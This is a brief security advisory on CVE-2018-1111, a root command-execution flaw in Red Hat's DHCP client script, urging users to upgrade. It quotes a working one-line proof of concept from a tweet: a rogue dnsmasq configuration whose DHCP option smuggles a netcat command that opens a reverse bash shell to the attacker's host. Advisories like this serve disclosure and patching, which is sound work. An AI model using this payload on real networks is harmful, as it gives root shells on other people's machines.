CVE-2018-1111: Red Hat DHCP Client Script Code Execution Vulnerability

On May 15, Red Hat officially issued a notice that it fixed a DHCP Client related vulnerability (CVE-2018-1111). When the system uses NetworkManager and configures the DHCP protocol, an attacker can use a malicious DHCP server or DHCP response constructed by the local network to execute arbitrary commands on the system with root privileges.

#CVE-2018-1111 tweetable PoC 🙂 dnsmasq –interface=eth0 –bind-interfaces –except-interface=lo –dhcp-range=10.1.1.1,10.1.1.10,1h –conf-file=/dev/null –dhcp-option=6,10.1.1.1 –dhcp-option=3,10.1.1.1 –dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat pic.twitter.com/vUICm2HluC

— Barkın Kılıç (@Barknkilic) May 15, 2018

CVE-2018-1111 Affected Versions

• Red Hat Enterprise Linux Server 6
• Red Hat Enterprise Linux Server 7

CVE-2018-1111 Unaffected Version

Solution

The official version of Red Hat has released a new version to fix the above vulnerabilities. Users should upgrade and protect them in time.

Because NetworkManager is enabled by default in a DHCP-based environment, it is strongly recommended that affected users install updates as soon as possible.